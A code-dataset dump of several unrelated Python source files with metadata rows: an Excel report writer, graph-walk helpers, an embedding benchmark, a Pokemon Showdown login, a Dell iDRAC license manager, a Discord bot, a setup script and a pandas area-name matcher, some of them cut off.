and other.item2 == self.item2
def __repr__(self):
return "(%s, %s, %s, %s)" % (self.item1.__repr__(), self.item2.__repr__(), str(self.item1.closed),str(self.item2.closed))
def can_shift_word1(self, word, index):
"""
Determines whether given word, index can be shifted onto the CFG item.
"""
assert isinstance(self.item1, CfgItem)
return self.item1.can_shift(word, index)
def can_shift_word2(self, word, index):
"""
Determines whether given word, index can be shifted onto the CFG item.
"""
assert isinstance(self.item2, CfgItem)
return self.item2.can_shift(word, index)
def shift_word1(self, word, index):
"""
Shifts onto the CFG item.
"""
assert isinstance(self.item1, CfgItem)
nitem = self.item1.shift(word, index)
self.shifted = (self.item1.shifted, self.item2.shifted)
return SynchronousItem(self.rule, self.item1class, self.item2class, nitem, self.item2, nodelabels = self.nodelabels)
def shift_word2(self, word, index):
"""
Shifts onto the CFG item.
"""
assert isinstance(self.item2, CfgItem)
nitem = self.item2.shift(word, index)
self.shifted = (self.item1.shifted, self.item2.shifted)
return SynchronousItem(self.rule, self.item1class, self.item2class, self.item1, nitem, nodelabels = self.nodelabels)
def can_shift_edge1(self, edge):
"""
Determines whether the given edge can be shifted onto the HERG item.
"""
assert isinstance(self.item1, HergItem)
self.shifted = (self.item1.shifted, self.item2.shifted)
return self.item1.can_shift(edge)
def can_shift_edge2(self, edge):
"""
Determines whether the given edge can be shifted onto the HERG item.
"""
assert isinstance(self.item2, HergItem)
self.shifted = (self.item1.shifted, self.item2.shifted)
return self.item2.can_shift(edge)
def shift_edge1(self, edge):
"""
Shifts onto the HERG item.
"""
nitem = self.item1.shift(edge)
return SynchronousItem(self.rule, self.item1class, self.item2class, nitem, self.item2, nodelabels = self.nodelabels)
def shift_edge2(self, edge):
"""
Shifts onto the HERG item.
"""
nitem = self.item2.shift(edge)
return SynchronousItem(self.rule, self.item1class, self.item2class, self.item1, nitem, nodelabels = self.nodelabels)
def can_complete(self, new_item):
"""
Determines whether given item can complete both sides.
"""
if not (self.item1.can_complete(new_item.item1) and
self.item2.can_complete(new_item.item2)):
return False
return True
def complete(self, new_item):
"""
Performs the synchronous completion, and gives back a new item.
"""
nitem1 = self.item1.complete(new_item.item1)
nitem2 = self.item2.complete(new_item.item2)
return SynchronousItem(self.rule, self.item1class, self.item2class, nitem1, nitem2, nodelabels = self.nodelabels)
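The span handling in `CfgItem.can_complete`/`CfgItem.complete` reduces to simple adjacency arithmetic. The helper below is a hypothetical extraction of that rule, not part of the module: an unanchored item (`i == -1`) adopts the new span, otherwise the two spans must touch.

```python
def merge_spans(i, j, new_i, new_j):
    """Hypothetical sketch of CfgItem.complete's span arithmetic."""
    if i == -1:                  # item not yet anchored in the sentence
        return new_i, new_j
    if new_i == j:               # new span extends this one to the right
        return i, new_j
    if new_j == i:               # new span extends this one to the left
        return new_i, j
    raise ValueError("spans are not adjacent")
```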
| 33.473154 | 125 | 0.646516 | 2,842 | 19,950 | 4.406756 | 0.110486 | 0.05709 | 0.038007 | 0.014372 | 0.49984 | 0.411769 | 0.36434 | 0.314756 | 0.301821 | 0.274752 | 0 | 0.02013 | 0.250476 | 19,950 | 595 | 126 | 33.529412 | 0.817428 | 0.225915 | 0 | 0.453297 | 0 | 0 | 0.010206 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.098901 | false | 0.002747 | 0.008242 | 0.021978 | 0.296703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb2f5ca3954e0ac0cd30c52e249acffaf9cb26a5 | 7,120 | py | Python | inc_cg_reporter/excel_writer.py | edwinsteele/inc-cg-reporter | 7bf63a9a0492b474526f6da54ea39b31a1a8d4fd | [
"MIT"
] | null | null | null | inc_cg_reporter/excel_writer.py | edwinsteele/inc-cg-reporter | 7bf63a9a0492b474526f6da54ea39b31a1a8d4fd | [
"MIT"
] | null | null | null | inc_cg_reporter/excel_writer.py | edwinsteele/inc-cg-reporter | 7bf63a9a0492b474526f6da54ea39b31a1a8d4fd | [
"MIT"
] | null | null | null | import datetime
import pathlib
from tempfile import NamedTemporaryFile
from typing import List, Dict
from backports.zoneinfo import ZoneInfo
from more_itertools import first
from openpyxl import Workbook
from openpyxl.styles import Alignment, Border, Side
from openpyxl.utils import get_column_letter
from openpyxl.worksheet.page import PrintPageSetup
from openpyxl.worksheet.worksheet import Worksheet
from inc_cg_reporter.connect_group import (
ConnectGroup,
ConnectGroupMembershipManager,
Person,
)
from inc_cg_reporter.field_definition import PERSONAL_ATTRIBUTE_NAME
class ConnectGroupWorksheetGenerator:
"""Creates a well formatted worksheet for a Connect Group"""
DATE_TYPE_COLUMN_WIDTH = 15
FIRST_COLUMN_WIDTH = 22
FIRST_ROW_HEIGHT = 2
HEADER_ROW_HEIGHT = 30
THIN_BORDER = Border(
left=Side(border_style="thin"),
right=Side(border_style="thin"),
top=Side(border_style="thin"),
bottom=Side(border_style="thin"),
)
def __init__(self, field_list: List[str]):
# column indexes start from 1 and enumerate uses zero-based counting,
# so we need to bump our column number by one
self._column_locations = {
col_name: col_number + 1 for col_number, col_name in (enumerate(field_list))
}
def person_as_row_values(self, person: Person) -> Dict[int, str]:
row = {}
# XXX this generator shouldn't need to know where to find the personal
# attributes on the person.
for column_name, value in person.personal_attributes.items():
row[self._column_locations[column_name]] = value
return row
def populate(self, ws: Worksheet, cg: ConnectGroup):
ws.title = cg.name
self.create_column_headers(ws)
for person in sorted(
cg.members, key=lambda p: p.personal_attributes[PERSONAL_ATTRIBUTE_NAME]
):
ws.append(self.person_as_row_values(person))
def create_column_headers(self, ws: Worksheet):
ws.cell(row=1, column=1, value="Name")
for col_name, col_index in self._column_locations.items():
ws.cell(row=1, column=col_index, value=col_name)
def insert_heading(self, ws: Worksheet):
# This can only be run after the table has been populated and styled
# given it prepends rows to the sheet. Ugh.
ws.insert_rows(0)
ws["A1"] = ws.title
ws.merge_cells("A1:{}1".format(get_column_letter(ws.max_column)))
# Style merged cells using the top left cell reference
ws["A1"].style = "Headline 1"
# alignment is overwritten by style, so set it afterwards
ws["A1"].alignment = Alignment(horizontal="center", vertical="center")
no_border = Side(border_style=None)
ws["A1"].border = Border(
left=no_border, right=no_border, top=no_border, outline=False
)
def style(self, ws: Worksheet):
# Give columns a fixed width so each sheet can print onto a single
# A4 in landscape mode.
for col_name, col_index in self._column_locations.items():
# column_dimensions requires a column name, not an index
ws.column_dimensions[
get_column_letter(col_index)
].width = self.DATE_TYPE_COLUMN_WIDTH
# Then override the first column width (it's like a header)
ws.column_dimensions["A"].width = self.FIRST_COLUMN_WIDTH
# Style the first column in a header-like way
for cell in first(ws.columns):
cell.style = "40 % - Accent1"
# Style header row (note the overlap with the name column... we're
# intentionally overwriting the style of A1 to be what is below)
for cell in first(ws.rows):
cell.style = "Accent1"
cell.alignment = Alignment(wrap_text=True, horizontal="center")
# Intended to be double height, with text wrap set in the loop below
ws.row_dimensions[1].height = self.HEADER_ROW_HEIGHT
# Style the data cells (non-header cells)
for row in ws.iter_rows(min_row=2, min_col=2):
for cell in row:
cell.alignment = Alignment(horizontal="center")
cell.border = self.THIN_BORDER
def setup_print_page_setup(self, ws):
        # fitToWidth isn't recognised by Numbers. Hardcoding a scale is ghastly,
        # but it works, and we can update it if it proves inappropriate.
ws.page_setup = PrintPageSetup(orientation="landscape", scale=75)
class ConnectGroupWorkbookManager:
"""An excel workbook, with sheets per connect group and a summary sheet"""
OUTPUT_FILENAME = "inc_cg.xlsx"
def __init__(
self,
membership_manager: ConnectGroupMembershipManager,
worksheet_generator: ConnectGroupWorksheetGenerator,
):
self._membership_manager = membership_manager
self._worksheet_generator = worksheet_generator
self._workbook = Workbook()
def insert_title_sheet(self) -> None:
about_sheet = self._workbook.create_sheet("About", 0)
about_sheet.title = "About"
about_sheet.column_dimensions["A"].width = 20
about_sheet.column_dimensions["B"].width = 40
now_au = datetime.datetime.now(tz=ZoneInfo("Australia/Sydney"))
about_sheet.append({"A": "Created:", "B": now_au.ctime()})
about_sheet.append(
{
"A": "Connect Group Count:",
"B": self._membership_manager.connect_groups_count,
}
)
about_sheet.append(
{
"A": "Connect Group Total Member Count:",
"B": self._membership_manager.connect_groups_member_count,
}
)
# Show a list of ConnectGroups
if self._membership_manager.connect_groups_member_count > 0:
about_sheet.append(
{"A": "Connect Group List:", "B": self._workbook.worksheets[1].title}
)
            # Ignore the zeroth worksheet (this About page) and the first
            # worksheet that we printed in the line above
for ws in self._workbook.worksheets[2:]:
about_sheet.append({"B": ws.title})
def create(self) -> None:
for connect_group in sorted(
self._membership_manager.connect_groups.values(), key=lambda x: x.name
):
ws = self._workbook.create_sheet()
self._worksheet_generator.populate(ws, connect_group)
self._worksheet_generator.style(ws)
self._worksheet_generator.insert_heading(ws)
self._worksheet_generator.setup_print_page_setup(ws)
# Remove the blank sheet that's created initially
self._workbook.remove(self._workbook.worksheets[0])
self.insert_title_sheet()
def save(self) -> pathlib.Path:
output_file = NamedTemporaryFile(delete=False)
self._workbook.save(output_file.name)
output_file.close()
output_path = pathlib.Path(output_file.name)
return output_path.rename(output_path.with_name(self.OUTPUT_FILENAME))
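The write-then-rename pattern in `save()` generalizes beyond workbooks. The sketch below is a hypothetical standard-library-only helper that writes bytes to a `NamedTemporaryFile` and renames it into place within the same directory, so readers never observe a half-written file under the final name.

```python
import pathlib
from tempfile import NamedTemporaryFile

def save_atomically(data: bytes, final_name: str) -> pathlib.Path:
    """Write data to a temp file, then rename it to final_name (same dir)."""
    tmp = NamedTemporaryFile(delete=False)
    tmp.write(data)
    tmp.close()
    tmp_path = pathlib.Path(tmp.name)
    return tmp_path.rename(tmp_path.with_name(final_name))
```

`delete=False` is essential here, as in the original: the temporary file must outlive its handle so the rename can claim it.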
| 39.776536 | 88 | 0.658287 | 901 | 7,120 | 5.00222 | 0.283019 | 0.019969 | 0.027957 | 0.016863 | 0.090748 | 0.069004 | 0.0497 | 0.019525 | 0.019525 | 0.019525 | 0 | 0.00754 | 0.254916 | 7,120 | 178 | 89 | 40 | 0.842036 | 0.188062 | 0 | 0.0625 | 0 | 0 | 0.039492 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085938 | false | 0 | 0.101563 | 0 | 0.265625 | 0.015625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb30048a187fc956b10e024a3231a64c928e715b | 1,969 | py | Python | position.py | wenwen0319/HIT_test | feba0c7dac4074ca3e602e499d3d946a6abce995 | [
"MIT"
] | null | null | null | position.py | wenwen0319/HIT_test | feba0c7dac4074ca3e602e499d3d946a6abce995 | [
"MIT"
] | null | null | null | position.py | wenwen0319/HIT_test | feba0c7dac4074ca3e602e499d3d946a6abce995 | [
"MIT"
] | null | null | null | # from numba import jit
import numpy as np
import logging
numba_logger = logging.getLogger('numba')
numba_logger.setLevel(logging.WARNING)
# @jit(nopython=True)
def nodets2key(batch: int, node: int, ts: float):
key = '-'.join([str(batch), str(node), float2str(ts)])
return key
# @jit(nopython=True)
def float2str(ts):
return str(int(round(ts)))
def make_batched_keys(node_record, t_record):
batch = node_record.shape[0]
support = node_record.shape[1]
batched_keys = make_batched_keys_l(node_record, t_record, batch, support)
batched_keys = np.array(batched_keys).reshape((batch, support))
# batched_keys = np.array([nodets2key(b, n, t) for b, n, t in zip(batch_matrix.ravel(), node_record.ravel(), t_record.ravel())]).reshape(batch, support)
return batched_keys
# @jit(nopython=True)
def make_batched_keys_l(node_record, t_record, batch, support):
batch_matrix = np.arange(batch).repeat(support).reshape((-1, support))
# batch_matrix = np.tile(np.expand_dims(np.arange(batch), 1), (1, support))
batched_keys = []
for i in range(batch):
for j in range(support):
b = batch_matrix[i, j]
n = node_record[i, j]
t = t_record[i, j]
batched_keys.append(nodets2key(b, n, t))
return batched_keys
# @jit(nopython=True)
def anonymize(node_records, batch, M, walk_len):
new_node_records = np.zeros_like(node_records)
for i in range(batch):
for j in range(M):
seen_nodes = []
for w in range(walk_len):
index = list_index(seen_nodes, node_records[i, j, w])
if index == len(seen_nodes):
seen_nodes.append(node_records[i, j, w])
new_node_records[i, j, w] = index
return new_node_records
# @jit(nopython=True)
def list_index(arr, item):
count = 0
for e in arr:
if e == item:
return count
count += 1
return count | 31.253968 | 156 | 0.638395 | 288 | 1,969 | 4.177083 | 0.253472 | 0.100582 | 0.062344 | 0.074813 | 0.270989 | 0.217789 | 0.177889 | 0.119701 | 0.119701 | 0.074813 | 0 | 0.007963 | 0.234637 | 1,969 | 63 | 157 | 31.253968 | 0.790312 | 0.175724 | 0 | 0.139535 | 0 | 0 | 0.003715 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.046512 | 0.023256 | 0.348837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
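`anonymize()` relabels every walk so each node becomes the index of its first appearance within that walk. A minimal single-walk version, a hypothetical helper in plain Python rather than the numpy arrays used above:

```python
def relabel_walk(walk):
    """Replace each node by the index of its first appearance in the walk."""
    seen = []
    out = []
    for node in walk:
        if node not in seen:
            seen.append(node)
        out.append(seen.index(node))
    return out

# e.g. relabel_walk([5, 7, 5, 9]) == [0, 1, 0, 2]
```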
bb3190ae66c1e67dd51acbaf941efef659b043cd | 3,495 | py | Python | train/compute/python/examples/pytorch/run_op_split_table_batched_embeddings.py | caogao/param | 9de2602c894df264a004c352ee16abc14f93da76 | [
"MIT"
] | 34 | 2020-10-07T23:55:19.000Z | 2022-03-15T03:18:23.000Z | train/compute/python/examples/pytorch/run_op_split_table_batched_embeddings.py | caogao/param | 9de2602c894df264a004c352ee16abc14f93da76 | [
"MIT"
] | 33 | 2020-10-09T23:57:45.000Z | 2022-03-24T08:15:35.000Z | train/compute/python/examples/pytorch/run_op_split_table_batched_embeddings.py | caogao/param | 9de2602c894df264a004c352ee16abc14f93da76 | [
"MIT"
] | 16 | 2020-10-08T12:43:08.000Z | 2022-03-04T17:09:15.000Z | import torch
from fbgemm_gpu.split_table_batched_embeddings_ops import PoolingMode
from ...lib import pytorch as lib_pytorch
from ...lib.config import make_op_config
from ...lib.init_helper import load_modules
from ...lib.pytorch.config_util import (
ExecutionPass,
create_op_args,
create_op_info,
get_benchmark_options,
)
from ...lib.pytorch.op_executor import OpExecutor
from ...workloads import pytorch as workloads_pytorch
def main():
# Load PyTorch implementations for data generator and operators.
load_modules(lib_pytorch)
# Load PyTorch operator workloads.
load_modules(workloads_pytorch)
    # Important to set the number of threads to 1: some ops are not thread
    # safe, and it also improves measurement stability.
torch.set_num_threads(1)
op_name = "SplitTableBatchedEmbeddingBagsCodegen"
op_info = create_op_info()
op_info[
"input_data_generator"
] = "SplitTableBatchedEmbeddingBagsCodegenInputDataGenerator"
print(op_info)
# Get the default benchmark options.
run_options = get_benchmark_options()
# Create OperatorConfig that initializes the actual operator workload and
# various generators to create inputs for the operator.
op_config = make_op_config(op_name, op_info, run_options["device"])
# By default, benchmark will run the forward pass.
# By setting backward (which requires running forward pass), the benchmark
# will run both forward and backward pass.
run_options["pass_type"] = ExecutionPass.BACKWARD
# Define config parameters required for input data generation and operator building.
num_tables = 1
rows = 228582
dim = 128
batch_size = 512
pooling_factor = 50
weighted = True
weights_precision = "fp16"
optimizer = "exact_row_wise_adagrad"
# Construct configuration for input data generator.
data_generator_config = create_op_args(
[
{"type": "int", "name": "num_tables", "value": num_tables},
{"type": "int", "name": "rows", "value": rows},
{"type": "int", "name": "dim", "value": dim},
{"type": "int", "name": "batch_size", "value": batch_size},
{"name": "pooling_factor", "type": "int", "value": pooling_factor},
{"type": "bool", "name": "weighted", "value": weighted},
{"type": "str", "name": "weights_precision", "value": weights_precision},
],
{"optimizer": {"type": "str", "value": optimizer}},
)
# Generate the actual data for inputs.
input_data_gen = op_config.input_data_generator()
(input_args, input_kwargs) = input_data_gen.get_data(
data_generator_config, run_options["device"]
)
# Construct and initialize the SplitTableBatchedEmbeddingBagsCodegen operator.
op_config.op.build(
num_tables,
rows,
dim,
PoolingMode.SUM,
weighted,
weights_precision,
optimizer,
)
# Create an OpExecutor to run the actual workload.
op_exe = OpExecutor(op_name, op_config.op, run_options)
# Run and collect the result metrics.
result = op_exe.run(input_args, input_kwargs, "0:0:0")
# Loop through and print the metrics.
print("### Benchmark Results ###")
for pass_name, pass_data in result.items():
print(f"pass: {pass_name}")
for metric_name, metrics in pass_data.items():
print(metric_name)
print(metrics)
if __name__ == "__main__":
main()
# ==== src/login.py (kushalnaidu/showdown-battle-bot, MIT) ====
import sys
import json
import requests
from src.senders import sender
async def log_in(websocket, challid, chall):
"""
Login in function. Send post request to showdown server.
:param websocket: Websocket stream
:param challid: first part of login challstr sent by server
:param chall: second part of login challstr sent by server
"""
with open(sys.path[0] + "/src/id.txt") as logfile:
username = logfile.readline()[:-1]
password = logfile.readline()[:-1]
resp = requests.post("https://play.pokemonshowdown.com/action.php?",
data={
'act': 'login',
'name': username,
'pass': password,
'challstr': challid + "%7C" + chall
})
await sender(websocket, "", "/trn " + username + ",0," + json.loads(resp.text[1:])['assertion'])
await sender(websocket, "", "/avatar 159")
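The login post above joins the two challstr parts with `"%7C"`; a quick stdlib check that this is simply the percent-encoded `|` separator (the id/chall values here are made up, the real pair comes from the server):

```python
from urllib.parse import quote

challid, chall = "4", "abc123"  # made-up values; the server sends the real pair
challstr = challid + "%7C" + chall  # "%7C" is the percent-encoded "|"
assert quote("|", safe="") == "%7C"
print(challstr)
```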
# ==== launch/sick_ldmrs.launch.py (Kaju-Bubanja/sick_scan2, Apache-2.0) ====
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
ld = LaunchDescription()
config = os.path.join(
get_package_share_directory('sick_scan2'),
'config',
'sick_ldmrs.yaml'
)
node = Node(
package='sick_scan2',
name='sick_scan2',
executable='sick_generic_caller',
output='screen',
parameters=[config]
)
ld.add_action(node)
return ld
# ==== omdrivers/lifecycle/iDRAC/iDRACLicense.py (DanielFroehlich/omsdk, Apache-2.0) ====
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Copyright © 2018 Dell Inc. or its subsidiaries. All rights reserved.
# Dell, EMC, and other trademarks are trademarks of Dell Inc. or its subsidiaries.
# Other trademarks may be trademarks of their respective owners.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Vaideeswaran Ganesan
#
import os
import re
import time
import xml.etree.ElementTree as ET
from enum import Enum
from datetime import datetime
from omsdk.sdkprint import PrettyPrint
from omsdk.sdkcenum import EnumWrapper, TypeHelper
from omsdk.lifecycle.sdklicenseapi import iBaseLicenseApi
from omdrivers.lifecycle.iDRAC.iDRACConfig import LicenseApiOptionsEnum
import base64
import sys
import logging
logger = logging.getLogger(__name__)
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
try:
from pysnmp.hlapi import *
from pysnmp.smi import *
PySnmpPresent = True
except ImportError:
PySnmpPresent = False
from omdrivers.enums.iDRAC.iDRACEnums import *
class iDRACLicense(iBaseLicenseApi):
def __init__(self, entity):
if PY2:
super(iDRACLicense, self).__init__(entity)
else:
super().__init__(entity)
self._job_mgr = entity.job_mgr
self._config_mgr = entity.config_mgr
self._license_fqdds = []
def _get_license_json(self):
if not hasattr(self, 'license') or "License" not in self.license:
self.license = {}
self.entity._get_entries(self.license, iDRACLicenseEnum)
if "LicensableDevice" in self.license:
entries = self.license["LicensableDevice"]
if isinstance(entries, dict):
entries = [entries]
for entry in entries:
self._license_fqdds.append(entry["FQDD"])
return self.license
def _get_license_text(self, entitlementId):
retVal = self.entity._export_license(id=entitlementId)
ltext = self.entity._get_field_from_action(retVal,
"Data", "ExportLicense_OUTPUT", "LicenseFile")
if ltext:
retVal['License'] = base64.b64decode(ltext).decode("utf-8")
return retVal
def _save_license_text(self, entitlementId, folder):
retVal = self._get_license_text(entitlementId)
with open(os.path.join(folder, entitlementId), "wb") as output:
output.write(retVal['License'].encode('UTF-8'))
output.flush()
return os.path.join(folder, entitlementId)
def export_license(self, folder):
expLic = []
if not os.path.exists(folder):
os.makedirs(folder)
elif not os.path.isdir(folder):
# replace with exception
return []
self._get_license_json()
if not "License" in self.license:
# replace with exception
return []
llist = self.license["License"]
if isinstance(self.license["License"], dict):
llist = [llist]
for i in llist:
entitlementId = i["EntitlementID"]
expLic.append(self._save_license_text(entitlementId, folder))
return expLic
def export_license_share(self, license_share_path):
self._get_license_json()
if not "License" in self.license:
return {"l": False}
llist = self.license["License"]
if isinstance(self.license["License"], dict):
llist = [llist]
retval = {'Status': 'Success', 'Exported': 0, 'Failed to Export': 0}
for i in llist:
entitlementId = i["EntitlementID"]
rjson = self.entity._export_license_share(share=license_share_path,
creds=license_share_path.creds, id=entitlementId)
rjson = self._job_mgr._job_wait(rjson['Message'], rjson)
if rjson['Status'] == 'Success':
retval['Exported'] += 1
else:
retval['Failed to Export'] += 1
if retval['Exported'] == 0 and retval['Failed to Export'] > 0:
retval['Status'] = 'Failed'
return retval
def _import_license_fqdd(self, license_file, fqdd="iDRAC.Embedded.1", options=LicenseApiOptionsEnum.NoOptions):
if not os.path.exists(license_file) or not os.path.isfile(license_file):
logger.debug(license_file + " is not a file!")
return False
content = ''
with open(license_file, 'rb') as f:
content = f.read()
content = bytearray(base64.b64encode(content))
for i in range(0, len(content) + 65, 65):
content[i:i] = '\n'.encode()
return self.entity._import_license(fqdd=fqdd,
options=options, file=content.decode())
def _import_license_share_fqdd(self, license_share_path, fqdd="iDRAC.Embedded.1",
options=LicenseApiOptionsEnum.NoOptions):
self._get_license_json()
if not "License" in self.license:
return False
llist = self.license["License"]
if isinstance(self.license["License"], dict):
llist = [llist]
retval = {'Status': 'Success', 'Imported': 0, 'Failed to Import': 0}
for i in llist:
entitlementId = i["EntitlementID"]
rjson = self.entity._import_license_share(share=license_share_path,
creds=license_share_path.creds, name="Import",
fqdd=fqdd, options=options)
rjson = self._job_mgr._job_wait(rjson['Message'], rjson)
logger.debug(rjson)
if rjson['Status'] == 'Success':
retval['Imported'] += 1
else:
retval['Failed to Import'] += 1
if retval['Imported'] == 0 and retval['Failed to Import'] > 0:
retval['Status'] = 'Failed'
return retval
def _replace_license_fqdd(self, license_file, entitlementId, fqdd="iDRAC.Embedded.1",
options=LicenseApiOptionsEnum.NoOptions):
if not os.path.exists(license_file) or not os.path.isfile(license_file):
logger.debug(license_file + " is not a file!")
return False
content = ''
with open(license_file) as f:
content = f.read()
return self.entity._replace_license(id=entitlementId,
fqdd=fqdd, options=options, file=content)
def _delete_license_fqdd(self, entitlementId, fqdd="iDRAC.Embedded.1", options=LicenseApiOptionsEnum.NoOptions):
return self.entity._delete_license(id=entitlementId,
fqdd=fqdd, options=options)
@property
def LicensableDeviceFQDDs(self):
self._get_license_json()
return self._license_fqdds
@property
def LicensableDevices(self):
self._get_license_json()
return list(self._config_mgr._fqdd_to_comp(self._license_fqdds))
@property
def Licenses(self):
self._get_license_json()
return self.license["License"]
def import_license(self, license_file, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._import_license_fqdd(license_file, fqdd=fqddlist[0], options=options)
def import_license_share(self, license_share_path, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._import_license_share_fqdd(license_share_path, fqdd=fqddlist[0], options=options)
def replace_license(self, license_file, entitlementId, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._replace_license_fqdd(license_file, entitlementId, fqdd=fqddlist[0], options=options)
def delete_license(self, entitlementId, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._delete_license_fqdd(entitlementId, fqdd=fqddlist[0], options=options)
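`_import_license_fqdd` above base64-encodes the license file and inserts a newline every 65 characters before handing it to the import call; an equivalent-in-spirit stdlib sketch of that wrapping (the payload bytes are made up):

```python
import base64
import textwrap

payload = b"x" * 200  # made-up license bytes
encoded = base64.b64encode(payload).decode()

# Break the encoded text into lines of at most 65 characters,
# as the license import expects.
wrapped = "\n".join(textwrap.wrap(encoded, 65))

assert all(len(line) <= 65 for line in wrapped.splitlines())
print(len(wrapped.splitlines()))
```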
# ==== inference/preprocessors/dummy.py (narumiruna/inference-template, MIT) ====
from ..utils import get_logger
from .preprocessors import Preprocessor
LOGGER = get_logger(__name__)
class DummyPreprocessor(Preprocessor):
def __call__(self, frame):
LOGGER.info('Call dummy pre-processor')
# ==== main.py (MustafaTheCoder/Basic-Discord-Bot, MIT) ====
import discord
from discord.ext import commands
client = commands.Bot(command_prefix="-")
@client.event
async def on_ready():
print("Bot is ready!")
@client.command()
async def Hello(ctx):
await ctx.send("Hi")
client.run("BOT TOKEN")
# ==== qoffeeapi/setup.py (foehlija/Qoffee-Maker, Apache-2.0) ====
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
from glob import glob
import os
from os.path import join as pjoin
from setuptools import setup, find_packages
HERE = os.path.dirname(os.path.abspath(__file__))
# The name of the project
name = 'qoffeeapi'
# Get the version
version_info = (0, 1, 0, 'dev')
version = ".".join(map(str, version_info))
setup_args = dict(
name = name,
version = version,
scripts = glob(pjoin('scripts', '*')),
packages = find_packages(),
author = 'Max Simon',
author_email = 'max.simon@ibm.com',
platforms = "Linux, Mac OS X, Windows",
include_package_data = True,
python_requires=">=3.6",
install_requires = [
'python-dotenv>=0.19.1'
],
extras_require = {
'test': [
'pytest>=4.6',
'pytest-cov',
'nbval',
]
},
entry_points = {
},
)
if __name__ == '__main__':
setup(**setup_args)
# ==== db_etl/processors/match_area_names.py (publichealthengland/coronavirus-dashboard-pipeline-etl, MIT) ====
#!/usr/bin/env python3
"""
<Description of the programme>
Author: Pouria Hadjibagheri <pouria.hadjibagheri@phe.gov.uk>
Created: 16 Dec 2020
License: MIT
Contributors: Pouria Hadjibagheri
"""
# Imports
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Python:
from io import StringIO
# 3rd party:
from pandas import DataFrame, read_csv, MultiIndex
# Internal:
try:
from __app__.utilities import get_storage_file
from __app__.utilities import func_logger
except ImportError:
from utilities import get_storage_file
from utilities import func_logger
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Header
__author__ = "Pouria Hadjibagheri"
__copyright__ = "Copyright (c) 2020, Public Health England"
__license__ = "MIT"
__version__ = "0.0.1"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__all__ = [
'match_area_names'
]
AREA_TYPE_NAMES = {
'nations': 'nation',
'nhsTrusts': 'nhsTrust',
'utlas': 'utla',
'ltlas': 'ltla',
'nhsRegions': 'nhsRegion',
'regions': 'region',
'uk': 'overview'
}
@func_logger("match area names")
def match_area_names(d: DataFrame, area_type_repls):
ref_names_io = StringIO(get_storage_file("pipeline", "assets/geoglist.csv"))
ref_names = read_csv(ref_names_io, usecols=["areaType", "areaCode", "areaName"])
ref_names.replace(area_type_repls, inplace=True)
ref_names = ref_names.loc[ref_names.areaCode.isin(d.areaCode), :]
ref_names.set_index(["areaType", "areaCode"], inplace=True)
# print(ref_names.areaType)
d = d.drop(columns=['areaType', 'areaName'])
print("post", d.shape)
result = (
d
# .drop(columns=['areaName'])
.join(ref_names, on=["areaType", "areaCode"], how="left")
)
return result
if __name__ == "__main__":
df = read_csv(
"/Users/pouria/Documents/Projects/coronavirus-data-etl/db_etl/test/v2/archive/processed_20201216-1545.csv",
usecols=["areaCode", "areaType", "date", "areaName", "newCasesBySpecimenDate"],
low_memory=False
).replace(AREA_TYPE_NAMES)
print(df.shape)
df = match_area_names(df, AREA_TYPE_NAMES)
print(df.shape)
print(df.tail(10).to_string())
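`match_area_names` above restores `areaName` by left-joining on the `(areaType, areaCode)` pair; the same lookup as a plain-dict sketch, with made-up reference rows standing in for `assets/geoglist.csv`:

```python
# Made-up reference rows standing in for assets/geoglist.csv
ref = {
    ("nation", "E92000001"): "England",
    ("region", "E12000007"): "London",
}

rows = [
    {"areaType": "nation", "areaCode": "E92000001"},
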